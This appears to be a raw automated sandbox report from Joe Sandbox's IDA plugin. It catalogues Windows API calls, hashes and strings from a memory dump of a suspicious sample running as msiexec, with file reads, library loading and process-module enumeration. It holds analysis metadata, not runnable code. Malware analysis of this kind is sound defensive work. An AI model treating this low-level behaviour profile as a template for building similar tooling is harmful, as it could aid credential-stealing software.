                                                                    • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                    • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                    • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                    • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Temp$DirectoryFileNamePathWindows
                                                                    • String ID:
                                                                    • API String ID: 1125800050-0
                                                                    • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                    • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                    • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                    • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                    • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleSleep
                                                                    • String ID: }A
                                                                    • API String ID: 252777609-2138825249
                                                                    • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                    • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                    • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                    • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                    APIs
                                                                    • malloc.MSVCRT ref: 00409A10
                                                                    • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                    • free.MSVCRT ref: 00409A31
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: freemallocmemcpy
                                                                    • String ID:
                                                                    • API String ID: 3056473165-0
                                                                    • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                    • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                    • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                    • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: d
                                                                    • API String ID: 0-2564639436
                                                                    • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                    • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                    • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                    • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: BINARY
                                                                    • API String ID: 2221118986-907554435
                                                                    • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                    • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                    • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                    • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp
                                                                    • String ID: /stext
                                                                    • API String ID: 2081463915-3817206916
                                                                    • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                    • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                    • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                    • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                    APIs
                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                    • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                    • String ID:
                                                                    • API String ID: 2445788494-0
                                                                    • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                    • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                    • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                    • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                    APIs
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                    • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                    • String ID:
                                                                    • API String ID: 3150196962-0
                                                                    • Opcode ID: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                    • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                    • Opcode Fuzzy Hash: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                    • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                    Strings
                                                                    • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: malloc
                                                                    • String ID: failed to allocate %u bytes of memory
                                                                    • API String ID: 2803490479-1168259600
                                                                    • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                    • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                    • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                    • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0041BDDF
                                                                    • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcmpmemset
                                                                    • String ID:
                                                                    • API String ID: 1065087418-0
                                                                    • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                    • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                    • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                    • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                    APIs
                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                    • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                      • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                      • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                      • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                    • String ID:
                                                                    • API String ID: 1381354015-0
                                                                    • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                    • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                    • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                    • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID:
                                                                    • API String ID: 1294909896-0
                                                                    • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                    • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                    • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                    • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                    APIs
                                                                      • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                      • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                      • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                      • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                    • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: File$Time$CloseCompareCreateHandlememset
                                                                    • String ID:
                                                                    • API String ID: 2154303073-0
                                                                    • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                    • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                    • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                    • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                    APIs
                                                                      • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                    • String ID:
                                                                    • API String ID: 3150196962-0
                                                                    • Opcode ID: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                    • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                    • Opcode Fuzzy Hash: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                    • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                    APIs
                                                                    • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: File$PointerRead
                                                                    • String ID:
                                                                    • API String ID: 3154509469-0
                                                                    • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                    • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                    • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                    • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                    APIs
                                                                    • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                      • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                      • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                      • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfile$StringWrite_itowmemset
                                                                    • String ID:
                                                                    • API String ID: 4232544981-0
                                                                    • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                    • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                    • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                    • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                    APIs
                                                                    • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                    • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                    • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                    • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                    APIs
                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$FileModuleName
                                                                    • String ID:
                                                                    • API String ID: 3859505661-0
                                                                    • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                    • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                    • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                    • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                    APIs
                                                                    • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                    • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                    • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                    • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                    APIs
                                                                    • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite
                                                                    • String ID:
                                                                    • API String ID: 3934441357-0
                                                                    • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                    • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                    • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                    • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                    APIs
                                                                    • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                    • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                    • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                    • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                    • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                    • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                    • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                    • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                    • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                    • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID:
                                                                    • API String ID: 613200358-0
                                                                    • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                    • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                    • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                    • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                    APIs
                                                                    • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                    Memory Dump Source
